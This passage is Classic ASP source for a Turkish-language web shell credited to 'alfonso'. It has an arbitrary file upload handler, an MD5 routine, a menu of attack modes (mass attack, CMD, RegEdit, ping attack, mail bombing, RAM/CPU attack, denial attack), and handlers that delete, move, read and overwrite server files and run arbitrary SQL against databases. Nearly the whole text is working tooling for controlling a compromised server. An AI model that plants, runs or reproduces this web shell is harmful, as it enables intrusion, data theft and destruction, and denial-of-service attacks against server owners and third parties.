                If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then

                    Set Fields = mobjFieldAry(llngIndex)

                    Exit Property

                End If

            Next

        End If

        Set Fields = New clsField

    End Property
 

    Private Sub Class_Terminate()

        Dim llngIndex

        For llngIndex = 0 To mlngCount - 1

            Set mobjFieldAry(llngIndex) = Nothing
 

        Next

        ReDim mobjFieldAry(-1)

    End Sub
 

    Private Sub Class_Initialize()

        ReDim mobjFieldAry(-1)

        CR = ChrB(Asc(vbCr))

        LF = ChrB(Asc(vbLf))

        CRLF = CR & LF

        mlngCount = 0

        Call RequestData

        Call ParseDelimiter()

        Call ParseData

    End Sub
 

    Private Function CStrU(ByRef pstrANSI)

        Dim llngLength

        Dim llngIndex

        llngLength = LenB(pstrANSI)

        For llngIndex = 1 To llngLength

            CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))

        Next

    End Function
 

    Private Function CStrB(ByRef pstrUnicode)

        Dim llngLength

        Dim llngIndex

        llngLength = Len(pstrUnicode)

        For llngIndex = 1 To llngLength

            CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))

        Next

    End Function

End Class
 

Class clsField

    Public Name

    Private mstrPath

    Public FileDir

    Public FileExt

    Public FileName

    Public ContentType

    Public Value

    Public BinaryData

    Public Length

    Private mstrText
 

    Public Property Get BLOB()

        BLOB = BinaryData

    End Property
 

    Public Function BinaryAsText()

        Dim lbinBytes

        Dim lobjRs

        If Length = 0 Then Exit Function

        If LenB(BinaryData) = 0 Then Exit Function
 

        If Not Len(mstrText) = 0 Then

            BinaryAsText = mstrText

            Exit Function

        End If

        lbinBytes = ASCII2Bytes(BinaryData)

           mstrText = Bytes2Unicode(lbinBytes)

        BinaryAsText = mstrText

    End Function
 

    Public Sub SaveAs(ByRef pstrFileName)

        Const adTypeBinary=1

        Const adSaveCreateOverWrite=2

        Dim lobjStream

        Dim lobjRs

        Dim lbinBytes

        If Length = 0 Then Exit Sub

        If LenB(BinaryData) = 0 Then Exit Sub

        Set lobjStream = Server.CreateObject("ADODB.Stream")

        lobjStream.Type = adTypeBinary

        Call lobjStream.Open()

        lbinBytes = ASCII2Bytes(BinaryData)

        Call lobjStream.Write(lbinBytes)
 

        On Error Resume Next
 

        Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
 

        'if err<>0 then response.Write "<br>"&err.Description
 

        Call lobjStream.Close()

        Set lobjStream = Nothing

    End Sub
 

    Public Property Let FilePath(ByRef pstrPath)

        mstrPath = pstrPath

        If Not InStrRev(pstrPath, ".") = 0 Then

            FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)

            FileExt = UCase(FileExt)

        End If

        If Not InStrRev(pstrPath, "\") = 0 Then

            FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)

        End If

        If Not InStrRev(pstrPath, "\") = 0 Then

            FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)

        End If

    End Property
 

    Public Property Get FilePath()

        FilePath = mstrPath

    End Property
 

    private Function ASCII2Bytes(ByRef pbinBinaryData)

        Const adLongVarBinary=205

        Dim lobjRs

        Dim llngLength

        Dim lbinBuffer

        llngLength = LenB(pbinBinaryData)

        Set lobjRs = Server.CreateObject("ADODB.Recordset")

        Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)

        Call lobjRs.Open()

        Call lobjRs.AddNew()

        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))

        Call lobjRs.Update()

        lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)

        Call lobjRs.Close()

        Set lobjRs = Nothing

        ASCII2Bytes = lbinBuffer

    End Function
 

    Private Function Bytes2Unicode(ByRef pbinBytes)

        Dim lobjRs

        Dim llngLength

        Dim lstrBuffer

        llngLength = LenB(pbinBytes)

        Set lobjRs = Server.CreateObject("ADODB.Recordset")

        Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)

        Call lobjRs.Open()

        Call lobjRs.AddNew()

        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)

        Call lobjRs.Update()

        lstrBuffer = lobjRs.Fields("BinaryData").Value

        Call lobjRs.Close()

        Set lobjRs = Nothing

        Bytes2Unicode = lstrBuffer

    End Function

End Class
 

function addslash(path)

    if right(path,1)="\" then addslash=path else addslash=path & "\"

end function
 

sub Upload()

    dim objUpload,f,max,i,name,path,size,success
 

    set objUpload=New clsUpload
 

    targetPath=objUpload.Fields("folder").Value

    max=objUpload.Fields("max").Value
 

    for i=1 to max

        name=objUpload.Fields("file" & i).FileName

        size=objUpload.Fields("file" & i).Length

        if (name<>"") and (size>0) then

            gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "

            path=addslash(targetPath) & name

            objUpload.Fields("file" & i).SaveAs path
 

            if FSO.FileExists(path) then

                on error resume next

                set f=objFSO.GetFile(path)

                if IsObject(f) then

                    if f.Size=size then success=true else success=false

                end if

                set f=nothing

            end if

            if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"

        end if

    next

    response.Write gMsg

    set objUpload=nothing
 

end sub
 
 
 

' MD5 kodlama baþladýý..

Private Const BITS_TO_A_BYTE = 8

Private Const BYTES_TO_A_WORD = 4

Private Const BITS_TO_A_WORD = 32
 

Private m_lOnBits(30)

Private m_l2Power(30)

 

    m_lOnBits(0) = CLng(1)

    m_lOnBits(1) = CLng(3)

    m_lOnBits(2) = CLng(7)

    m_lOnBits(3) = CLng(15)

    m_lOnBits(4) = CLng(31)

    m_lOnBits(5) = CLng(63)

    m_lOnBits(6) = CLng(127)

    m_lOnBits(7) = CLng(255)

    m_lOnBits(8) = CLng(511)

    m_lOnBits(9) = CLng(1023)

    m_lOnBits(10) = CLng(2047)

    m_lOnBits(11) = CLng(4095)

    m_lOnBits(12) = CLng(8191)

    m_lOnBits(13) = CLng(16383)

    m_lOnBits(14) = CLng(32767)

    m_lOnBits(15) = CLng(65535)

    m_lOnBits(16) = CLng(131071)

    m_lOnBits(17) = CLng(262143)

    m_lOnBits(18) = CLng(524287)

    m_lOnBits(19) = CLng(1048575)

    m_lOnBits(20) = CLng(2097151)

    m_lOnBits(21) = CLng(4194303)

    m_lOnBits(22) = CLng(8388607)

    m_lOnBits(23) = CLng(16777215)

    m_lOnBits(24) = CLng(33554431)

    m_lOnBits(25) = CLng(67108863)

    m_lOnBits(26) = CLng(134217727)

    m_lOnBits(27) = CLng(268435455)

    m_lOnBits(28) = CLng(536870911)

    m_lOnBits(29) = CLng(1073741823)

    m_lOnBits(30) = CLng(2147483647)

    

    m_l2Power(0) = CLng(1)

    m_l2Power(1) = CLng(2)

    m_l2Power(2) = CLng(4)

    m_l2Power(3) = CLng(8)

    m_l2Power(4) = CLng(16)

    m_l2Power(5) = CLng(32)

    m_l2Power(6) = CLng(64)

    m_l2Power(7) = CLng(128)

    m_l2Power(8) = CLng(256)

    m_l2Power(9) = CLng(512)

    m_l2Power(10) = CLng(1024)

    m_l2Power(11) = CLng(2048)

    m_l2Power(12) = CLng(4096)

    m_l2Power(13) = CLng(8192)

    m_l2Power(14) = CLng(16384)

    m_l2Power(15) = CLng(32768)

    m_l2Power(16) = CLng(65536)

    m_l2Power(17) = CLng(131072)

    m_l2Power(18) = CLng(262144)

    m_l2Power(19) = CLng(524288)

    m_l2Power(20) = CLng(1048576)

    m_l2Power(21) = CLng(2097152)

    m_l2Power(22) = CLng(4194304)

    m_l2Power(23) = CLng(8388608)

    m_l2Power(24) = CLng(16777216)

    m_l2Power(25) = CLng(33554432)

    m_l2Power(26) = CLng(67108864)

    m_l2Power(27) = CLng(134217728)

    m_l2Power(28) = CLng(268435456)

    m_l2Power(29) = CLng(536870912)

    m_l2Power(30) = CLng(1073741824)
 

Private Function LShift(lValue, iShiftBits)

    If iShiftBits = 0 Then

        LShift = lValue

        Exit Function

    ElseIf iShiftBits = 31 Then

        If lValue And 1 Then

            LShift = &H80000000

        Else

            LShift = 0

        End If

        Exit Function

    ElseIf iShiftBits < 0 Or iShiftBits > 31 Then

        Err.Raise 6

    End If
 

    If (lValue And m_l2Power(31 - iShiftBits)) Then

        LShift = ((lValue And m_lOnBits(31 - (iShiftBits + 1))) * m_l2Power(iShiftBits)) Or &H80000000

    Else

        LShift = ((lValue And m_lOnBits(31 - iShiftBits)) * m_l2Power(iShiftBits))

    End If

End Function

Private Function RShift(lValue, iShiftBits)

    If iShiftBits = 0 Then

        RShift = lValue

        Exit Function

    ElseIf iShiftBits = 31 Then

        If lValue And &H80000000 Then

            RShift = 1

        Else

            RShift = 0

        End If

        Exit Function

    ElseIf iShiftBits < 0 Or iShiftBits > 31 Then

        Err.Raise 6

    End If

    

    RShift = (lValue And &H7FFFFFFE) \ m_l2Power(iShiftBits)
 

    If (lValue And &H80000000) Then

        RShift = (RShift Or (&H40000000 \ m_l2Power(iShiftBits - 1)))

    End If

End Function
 

Private Function RotateLeft(lValue, iShiftBits)

    RotateLeft = LShift(lValue, iShiftBits) Or RShift(lValue, (32 - iShiftBits))

End Function
 

Private Function AddUnsigned(lX, lY)

    Dim lX4

    Dim lY4

    Dim lX8

    Dim lY8

    Dim lResult

 

    lX8 = lX And &H80000000

    lY8 = lY And &H80000000

    lX4 = lX And &H40000000

    lY4 = lY And &H40000000

 

    lResult = (lX And &H3FFFFFFF) + (lY And &H3FFFFFFF)

 

    If lX4 And lY4 Then

        lResult = lResult Xor &H80000000 Xor lX8 Xor lY8

    ElseIf lX4 Or lY4 Then

        If lResult And &H40000000 Then

            lResult = lResult Xor &HC0000000 Xor lX8 Xor lY8

        Else

            lResult = lResult Xor &H40000000 Xor lX8 Xor lY8

        End If

    Else

        lResult = lResult Xor lX8 Xor lY8

    End If

 

    AddUnsigned = lResult

End Function
 

Private Function Fq(x, y, z)

    Fq = (x And y) Or ((Not x) And z)

End Function
 

Private Function Gq(x, y, z)

    Gq = (x And z) Or (y And (Not z))

End Function
 

Private Function Hq(x, y, z)

    Hq = (x Xor y Xor z)

End Function
 

Private Function Iq(x, y, z)

    Iq = (y Xor (x Or (Not z)))

End Function
 

Private Sub FF(a, b, c, d, x, s, ac)

    a = AddUnsigned(a, AddUnsigned(AddUnsigned(Fq(b, c, d), x), ac))

    a = RotateLeft(a, s)

    a = AddUnsigned(a, b)

End Sub
 

Private Sub GG(a, b, c, d, x, s, ac)

    a = AddUnsigned(a, AddUnsigned(AddUnsigned(Gq(b, c, d), x), ac))

    a = RotateLeft(a, s)

    a = AddUnsigned(a, b)

End Sub
 

Private Sub HH(a, b, c, d, x, s, ac)

    a = AddUnsigned(a, AddUnsigned(AddUnsigned(Hq(b, c, d), x), ac))

    a = RotateLeft(a, s)

    a = AddUnsigned(a, b)

End Sub
 

Private Sub II(a, b, c, d, x, s, ac)

    a = AddUnsigned(a, AddUnsigned(AddUnsigned(Iq(b, c, d), x), ac))

    a = RotateLeft(a, s)

    a = AddUnsigned(a, b)

End Sub
 

'*********************************************************

'*************   COnverted by ALFONSO ;)  ****************

'*******  The Brute Algortihms Owned to alfonso  ;)   ******

'*********************************************************

'*********************************************************
 

Private Function ConvertToWordArray(sMessage)

    Dim lMessageLength

    Dim lNumberOfWords

    Dim lWordArray()

    Dim lBytePosition

    Dim lByteCount

    Dim lWordCount

    

    Const MODULUS_BITS = 512

    Const CONGRUENT_BITS = 448

    

    lMessageLength = Len(sMessage)

    

    lNumberOfWords = (((lMessageLength + ((MODULUS_BITS - CONGRUENT_BITS) \ BITS_TO_A_BYTE)) \ (MODULUS_BITS \ BITS_TO_A_BYTE)) + 1) * (MODULUS_BITS \ BITS_TO_A_WORD)

    ReDim lWordArray(lNumberOfWords - 1)

    

    lBytePosition = 0

    lByteCount = 0

    Do Until lByteCount >= lMessageLength

        lWordCount = lByteCount \ BYTES_TO_A_WORD

        lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE

        lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(Asc(Mid(sMessage, lByteCount + 1, 1)), lBytePosition)

        lByteCount = lByteCount + 1

    Loop
 

    lWordCount = lByteCount \ BYTES_TO_A_WORD

    lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE
 

    lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(&H80, lBytePosition)
 

    lWordArray(lNumberOfWords - 2) = LShift(lMessageLength, 3)

    lWordArray(lNumberOfWords - 1) = RShift(lMessageLength, 29)

    

    ConvertToWordArray = lWordArray

End Function
 

Private Function WordToHex(lValue)

    Dim lByte

    Dim lCount

    

    For lCount = 0 To 3

        lByte = RShift(lValue, lCount * BITS_TO_A_BYTE) And m_lOnBits(BITS_TO_A_BYTE - 1)

        WordToHex = WordToHex & Right("0" & Hex(lByte), 2)

    Next

End Function
 
 

Public Function MD5(sMessage)

    Dim x

    Dim k

    Dim AA

    Dim BB

    Dim CC

    Dim DD

    Dim a

    Dim b

    Dim c

    Dim d

    

    Const S11 = 7

    Const S12 = 12

    Const S13 = 17

    Const S14 = 22

    Const S21 = 5

    Const S22 = 9

    Const S23 = 14

    Const S24 = 20

    Const S31 = 4

    Const S32 = 11

    Const S33 = 16

    Const S34 = 23

    Const S41 = 6

    Const S42 = 10

    Const S43 = 15

    Const S44 = 21
 

    x = ConvertToWordArray(sMessage)

    

    a = &H67452301

    b = &HEFCDAB89

    c = &H98BADCFE

    d = &H10325476
 

    For k = 0 To UBound(x) Step 16

        AA = a

        BB = b

        CC = c

        DD = d

    

        FF a, b, c, d, x(k + 0), S11, &HD76AA478

        FF d, a, b, c, x(k + 1), S12, &HE8C7B756

        FF c, d, a, b, x(k + 2), S13, &H242070DB

        FF b, c, d, a, x(k + 3), S14, &HC1BDCEEE

        FF a, b, c, d, x(k + 4), S11, &HF57C0FAF

        FF d, a, b, c, x(k + 5), S12, &H4787C62A

        FF c, d, a, b, x(k + 6), S13, &HA8304613

        FF b, c, d, a, x(k + 7), S14, &HFD469501

        FF a, b, c, d, x(k + 8), S11, &H698098D8

        FF d, a, b, c, x(k + 9), S12, &H8B44F7AF

        FF c, d, a, b, x(k + 10), S13, &HFFFF5BB1

        FF b, c, d, a, x(k + 11), S14, &H895CD7BE

        FF a, b, c, d, x(k + 12), S11, &H6B901122

        FF d, a, b, c, x(k + 13), S12, &HFD987193

        FF c, d, a, b, x(k + 14), S13, &HA679438E

        FF b, c, d, a, x(k + 15), S14, &H49B40821

    

        GG a, b, c, d, x(k + 1), S21, &HF61E2562

        GG d, a, b, c, x(k + 6), S22, &HC040B340

        GG c, d, a, b, x(k + 11), S23, &H265E5A51

        GG b, c, d, a, x(k + 0), S24, &HE9B6C7AA

        GG a, b, c, d, x(k + 5), S21, &HD62F105D

        GG d, a, b, c, x(k + 10), S22, &H2441453

        GG c, d, a, b, x(k + 15), S23, &HD8A1E681

        GG b, c, d, a, x(k + 4), S24, &HE7D3FBC8

        GG a, b, c, d, x(k + 9), S21, &H21E1CDE6

        GG d, a, b, c, x(k + 14), S22, &HC33707D6

        GG c, d, a, b, x(k + 3), S23, &HF4D50D87

        GG b, c, d, a, x(k + 8), S24, &H455A14ED

        GG a, b, c, d, x(k + 13), S21, &HA9E3E905

        GG d, a, b, c, x(k + 2), S22, &HFCEFA3F8

        GG c, d, a, b, x(k + 7), S23, &H676F02D9

        GG b, c, d, a, x(k + 12), S24, &H8D2A4C8A

            

        HH a, b, c, d, x(k + 5), S31, &HFFFA3942

        HH d, a, b, c, x(k + 8), S32, &H8771F681

        HH c, d, a, b, x(k + 11), S33, &H6D9D6122

        HH b, c, d, a, x(k + 14), S34, &HFDE5380C

        HH a, b, c, d, x(k + 1), S31, &HA4BEEA44

        HH d, a, b, c, x(k + 4), S32, &H4BDECFA9

        HH c, d, a, b, x(k + 7), S33, &HF6BB4B60

        HH b, c, d, a, x(k + 10), S34, &HBEBFBC70

        HH a, b, c, d, x(k + 13), S31, &H289B7EC6

        HH d, a, b, c, x(k + 0), S32, &HEAA127FA

        HH c, d, a, b, x(k + 3), S33, &HD4EF3085

        HH b, c, d, a, x(k + 6), S34, &H4881D05

        HH a, b, c, d, x(k + 9), S31, &HD9D4D039

        HH d, a, b, c, x(k + 12), S32, &HE6DB99E5

        HH c, d, a, b, x(k + 15), S33, &H1FA27CF8

        HH b, c, d, a, x(k + 2), S34, &HC4AC5665

    

        II a, b, c, d, x(k + 0), S41, &HF4292244

        II d, a, b, c, x(k + 7), S42, &H432AFF97

        II c, d, a, b, x(k + 14), S43, &HAB9423A7

        II b, c, d, a, x(k + 5), S44, &HFC93A039

        II a, b, c, d, x(k + 12), S41, &H655B59C3

        II d, a, b, c, x(k + 3), S42, &H8F0CCC92

        II c, d, a, b, x(k + 10), S43, &HFFEFF47D

        II b, c, d, a, x(k + 1), S44, &H85845DD1

        II a, b, c, d, x(k + 8), S41, &H6FA87E4F

        II d, a, b, c, x(k + 15), S42, &HFE2CE6E0

        II c, d, a, b, x(k + 6), S43, &HA3014314

        II b, c, d, a, x(k + 13), S44, &H4E0811A1

        II a, b, c, d, x(k + 4), S41, &HF7537E82

        II d, a, b, c, x(k + 11), S42, &HBD3AF235

        II c, d, a, b, x(k + 2), S43, &H2AD7D2BB

        II b, c, d, a, x(k + 9), S44, &HEB86D391

    

        a = AddUnsigned(a, AA)

        b = AddUnsigned(b, BB)

        c = AddUnsigned(c, CC)

        d = AddUnsigned(d, DD)

    Next

    

    MD5 = LCase(WordToHex(a) & WordToHex(b) & WordToHex(c) & WordToHex(d))

End Function

'***************************************************************************************************************************

'***************************  MD5 KOdlarý Biter.   *************************************************************************

'***************************************************************************************************************************

if popup = False then

'Link ve Konum paneli by alfonso

'Türk Bayraðý Ascii Karakterlerle - Created By ALFONSO

Response.Write "<center><table width=80 height=50 cellpadding=0 cellspacing=0><tr><td width=10 align=left valign=middle style=""background-color:AA0000"">&nbsp;</td><td width=70 align=left valign=middle style=""background-color:AA0000""><font size=7 face=Wingdings>Z</font></td></tr></table></center>"

response.write "<center><table width=""100%"" align=""center"">"

response.write "<tr valign=""top""><td colspan=""2"" align=""center""><br>"

response.write "<table cellpadding=""0"" cellspacing=""0"" height=""25""><tr><td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<a href='"&FilePath&"?mode=37&konum="&konum&"&Time="&time&"'><b>Sistem Analizi*</b></a> | <a href='"&FilePath&"?mode=18&konum="&konum&"&Time="&time&"' onclick=""mass(this.href);return false;""><b>MASS Attack</b></a> | <a href='"&FilePath&"?mode=21&konum="&FolderPath&"&Time="&time&"' onclick=""tester(this.href);return false;""><b> Permision Tester </b></a> | <a href='"&FilePath&"?mode=24&konum="&konum&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>Klasör Ýþlemleri</b></a> | <a href='"&FilePath&"?mode=28&konum="&konum&"&Time="&time&"' onclick=""cmd(this.href);return false;""><b> CMD </b></a> | <a href='"&FilePath&"?mode=34&konum="&konum&"&Time="&time&"' ><b> My-MS_SQL </b></a> | <a href='"&FilePath&"?mode=45&konum="&konum&"&Time="&time&"' onclick=""cmd(this.href);return false;""><b> RegEdit </b></a> | <a href='"&FilePath&"?mode=99&konum="&konum&"&Time="&time&"' onclick=""biz(this.href);return false;""><b> *Biz Kimiz*! </b></a>&nbsp;&nbsp;&nbsp;</td></tr></table><br>"

response.write "<table cellpadding=""0"" cellspacing=""0"" height=""25""><tr><td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<a href='"&FilePath&"?mode=30&konum="&konum&"&Time="&time&"' onclick=""cmd(this.href);return false;""><b> Ping Saldýrýsý </b></a> | <a href='"&FilePath&"?mode=33&konum="&konum&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;""><b> Mail Bombardýmaný </b></a> | <a href='"&FilePath&"?mode=31&konum="&konum&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;""><b> Ram & Cpu Saldýrýsý </b></a> | <a href='"&FilePath&"?mode=32&konum="&konum&"&Time="&time&"' onclick=""somur(this.href);return false;""><b> Denial Attack </b></a> | <a href='"&FilePath&"?mode=39&konum="&konum&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b> MD5&Serv-U </b></a> | <a href='"&FilePath&"?mode=42&konum="&konum&"&Time="&time&"' onclick=""mass(this.href);return false;""><b> MSWCTools </b></a> | <a href='"&FilePath&"?mode=44&konum="&konum&"&Time="&time&"' onclick=""mass(this.href);return false;""><b> XMLHTTP </b></a>&nbsp;&nbsp;&nbsp;</td></tr></table><br>"

response.write "</td></tr><td><tr><form action = "" "&FilePath&"?mode=23&konum="&konum&"&Time="&time&" "" method=""post""><table cellpadding=""0"" cellspacing=""0""><tr><td style=""background-color:121212"" class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b>Arama: &nbsp;&nbsp;&nbsp;</b></td><td><input name=""hacked"" value=""mdb"" type=""text"" style=""width:200px;""></td><td><input type=""Submit"" value=""&nbsp;&nbsp;Ara &raquo;&nbsp;&nbsp;"" style=""width:70; font-weight:bold;""></td></tr></table></td></form></tr><td><tr>"

response.write "<form action = "" "&FilePath&"?mode=1&Time="&time&" "" method=""post"">"

response.write "<table cellpadding=""0"" cellspacing=""0""><tr><td style=""background-color:121212"" class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b>Konum : &nbsp;&nbsp;&nbsp;</b></td><td><input name=""remote"" value='"&konum&"' type=""text"" style=""width:350px;""></td><td><input type=""Submit"" value=""Git &raquo;"" style=""width:50; font-weight:bold;""></td></tr></table>"

response.write ""

response.write "</td></form></tr>"

response.write "</table></center>"
 

'Yetki paneli Coded by alfonso

response.write "<table width=""100%"">"

response.write "<tr valign=""top""><td colspan=""2"" align=""center"">"

response.write "<table cellpadding=""0"" cellspacing=""0"">"

response.write "<tr><td style=""background-color:121212"" class=""kbrtm"">&nbsp;&nbsp;&nbsp;<b>Yetki :</b>&nbsp;&nbsp;&nbsp;</td>"

call yetki

response.write "</tr></table>"

response.write "<br></td></tr></table><br>"

end if
 
 
 

SELECT CASE mode

CASE 2 ' Dizin kopyala TAÞI Coded by alfonso

on error resume next

response.write "<table width=""100%"">"

response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"

response.write "<form name=""dizincopypaste"" action='"&FilePath&"' type=""post"">"

response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"

tablo30(" <b>Dizin Kopyala / Taþý Merkezi</b>")

tablo30("&nbsp;")

response.write "<input type=""hidden"" value=""3"" name=""mode""><input type=""hidden"" value="&file&" name=""file2""><input type=""hidden"" value="&FolderPath&" name=""konum""><input type=""hidden"" value="&time&" name=""Time""> " 

tablo12("Kop. Yer : <input style='color=#C6FCBE'  size=""60"" type=""text"" name=""FolderPath2"" value="&FolderPath&">")

tablo12("<input type=radio name='islem' value='kopyala' checked>Kopyala  <input type=radio name='islem' value='tasi'>Tasi ")

tablo12("<br><input value="" Gönder "" type=""Submit"">")

response.write "</form></table></td></tr></table><br>"

Call Hata
 

CASE 3 ' dizin kop taþýmam gerçekleþiyor  by alfonso

on error resume next

if islem="kopyala" then

    FSO.CopyFolder konum,FolderPath2

    isl="kopyalandý.."

elseif islem="tasi" then

    FSO.MoveFolder konum,FolderPath2

    isl="taþýndý.."

end if

response.Write "<br><br><center>Klasor "&isl&" <br>"

response.Write "<br><font color=yellow>Kaynak : </font>"&FolderPath&"<br><font color=yellow>Hedef : </font>"&FolderPath2

response.Write "<br><br>by alfonso</center>"

Call Hata
 

CASE 4 ' Dizin SÝlmee by alfonso

on error resume next

FSO.DeleteFolder del

if err<>0 then

Call olmadi("Dizin Silenemdi")

else

Call oldu("Dizin Silindi")

end if
 

CASE 5 ' Dosya silme olayý gerçekliþiypor  by alfonso

on error resume next

FSO.DeleteFile del

if err<>0 then

Call olmadi("Dosya Silinemedi")

else

Call oldu("Dosya Silindi")

end if
 

'CASE 6 ' Dosya Dowlaod etme by alfonso

' Download hatalý olduðu için, ÜSTTE taþýdýmm
 

CASE 7 ' Dosya Kopayla Taþýma POST kýsmý by alfonso

on error resume next

response.write "<table width=""100%"">"

response.write "<tr class=""kbrtm"" valign=""top""><td colspan=""2"" align=""center"">"

response.write "<form name=""dosyacopypaste"" action='"&FilePath&"' type=""post"">"

response.write "<table class=""kbrtm"" cellpadding=""1"" cellspacing=""1"" bgcolor=""#5d5d5d"" width=""100%"">"

tablo30(" <b>Dosya Kopyala / Taþý Merkezi</b>")

tablo30("&nbsp;")

response.write "<input type=""hidden"" value=""8"" name=""mode""><input type=""hidden"" value="&time&" name=""Time""><input type=""hidden"" value="&file&" name=""file""> " 

tablo12("Kop. Yer : <input  size=""60"" type=""text"" name=""folder"" value="&file&">")

tablo12("<input type=radio name='islem' value='kopyala' checked>Kopyala  <input type=radio name='islem' value='tasi'>Tasi ")

tablo12("<br><input value="" Gönder "" type=""Submit"">")

response.write "</form></table></td></tr></table><br>"

Call Hata
 

CASE 8 ' Dosya kopyala, taþýmaa olayý by alfonso

on error resume next

if islem="kopyala" then

    FSO.CopyFile file,folder&""

    isl="kopyalandý.."

elseif islem="tasi" then

    FSO.MoveFile file,folder&""

    isl="taþýndý.."

end if

if err <> 0 then

response.Write "<br><br><center>Baþarýsýzlýkla sonuçlandý !!! <br>"

else

response.Write "<br><br><center>Klasor "&isl&" <br>"

end if

response.Write "<br><font color=yellow>Kaynak : </font>"&file&"<br><font color=yellow>Hedef : </font>"&folder&"\"

response.Write "<br><br>by alfonso</center>"

Call Hata
 

CASE 9 ' Dosya Ýçini görüntüle by alfonso

on error resume next

Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"

Response.Write "<table class=""kbrtm"" width=100% ><tr><td>"

set f = FSO.OpenTextFile(file,1)

Response.Write "<font size=3><pre>"&Server.HTMLEncode(f.readAll)&"</pre></font>"

Response.Write "</td></tr></table>"

nolist = True

if err<>62 then Hata

if err.number=62 then 

Response.Write "<script language=javascript>alert('Bu Dosya Okunamýyor\nSistem dosyasý olabilir')</script>"

nolist = False

end if
 

CASE 10 ' ASP txt php .. gibi dosyalarý Editlemek için POSt kýsmý by alfonso 

on error resume next

set f = FSO.OpenTextFile(file,1)

response.Write "<center><form action='"&FilePath&"?Time="&time&"&konum="&FolderPath&"' method=""post""><table class=""kbrtm""><tr><td align=""center"">"

Response.Write "<input type=hidden name=""mode"" value='11'>"

Response.Write "<input type=hidden name=file value="&file&">"

Response.Write "<br><br><input type=submit value="" .. ::   Kaydet  :: ..  ""><br><br></td></tr><tr><td align=""center"">"

Response.Write "<textarea name=""islem"" style='width:90%;height:350;'>"

Response.Write server.HTMLEncode(f.readAll)

Response.Write "</textarea></td></tr></table></form></center>"

Call Hata

nolist = True
 

CASE 11 ' Editleme olayýý gerçekleþiyor by alfonso

on error resume next

set saveTextFile = FSO.OpenTextFile(file,2,true,false)

Call Hata

saveTextFile.Write(islem)

saveTextFile.close

if err<>0 then

olmadi("Editlenemedii")

else

oldu("Editlendi")

end if
 

CASE 12 ' Resim Dosyasýný Görüntülee  by alfonso

on error resume next

Response.Write "<br><center><img ALT=""CyberWarrior // ALFONSO"" src='"&file&"'></center><br><br>"

Call Hata

nolist = True
 

CASE 13 ' SQL için TAblolarý Listeleme by alfonso

Response.Write "<center><b><font size=3>Tablolar</font></br><br>"

Set objConn = Server.CreateObject("ADODB.Connection")

Set objADOX = Server.CreateObject("ADOX.Catalog")

objConn.Provider = "Microsoft.Jet.Oledb.4.0"

objConn.ConnectionString = file

objConn.Open

objADOX.ActiveConnection = objConn
 

response.write "<table class=""kbrtm"">"

For Each table in objADOX.Tables

    If table.Type = "TABLE" Then

        Response.Write "<tr><td><font face=wingdings size=5>4</font> <a href='"&FilePath&"?mode=14&file="&file&"&table="&table.Name&"&konum="&FolderPath&"&time="&time&"'>"&table.Name&"</a></td></tr>"

    End If

Next

response.write "</table>"

response.write "</center>"

Call Hata

nolist = True
 

CASE 14 ' TAblo içeriði görüntüleme by alfonso

Call SQL_menu_by_alfonso

Call SQL_by_alfonso(file,table)

nolist = True
 

CASE 15 ' SQL kod yerleþtirme olayý by alfonso

if islem = "select" then inject = inject1

if islem = "delete" then inject = inject2

if islem = "insert" then inject = inject3

if islem = "update" then inject = inject4

if islem = "diger" then inject = inject5

SQL_menu_by_alfonso

response.write "<br><center>Db Yeri : <font color=#C6FCBE>"&file&"</font></center>"

response.write "<br><center>Sql komut : <font color=#C6FCBE>"&inject&"</font></center><br>"

if islem = "select" then

	if not alfonsosql = "" then

		Call MSSQL_by_alfonso(alfonsosql,inject)

	else

		Call SQL_by_alfonso(file,inject)

	end if

else

on error resume next

if alfonsosql = "" then

	Set objConn = Server.CreateObject("ADODB.Connection")

	Set objRcs = Server.CreateObject("ADODB.RecordSet")

	objConn.Provider = "Microsoft.Jet.Oledb.4.0"

	objConn.ConnectionString = file

	objConn.Open

else

	Set objConn = Server.CreateObject("ADODB.Connection")

	Set objRcs = Server.CreateObject("ADODB.RecordSet")

	objConn.Open alfonsosql

end if
 

if err <> 0 then

	response.write "<br><br><center> <font color=#FE7A84> <font face=Wingdings size=5>N</font> DataBase ile Baðlantýnýz SaðlanaMAdýý !!! by alfonso :( <font color=#FE7A84> <font face=Wingdings size=5>N</font> </font> </center><br><br>"

else

	on error resume next

	objRcs.Open inject,objConn, adOpenKeyset , , adCmdText

	if err <> 0 then

		Call olmadi("<br>SQL Ýnjection Komutunuzda HATA var. Bilmiyorsan Kullanma<br><br>")

	else

		Call oldu("<br> SQL Ýnjection Baþarýyla GErçekleþtii.<br><br>")

	end if

end if

objRcs.close

objConn.close

end if

nolist = True
 

CASE 16 ' Dosya ADI deðiþtirme Formu by alfonso

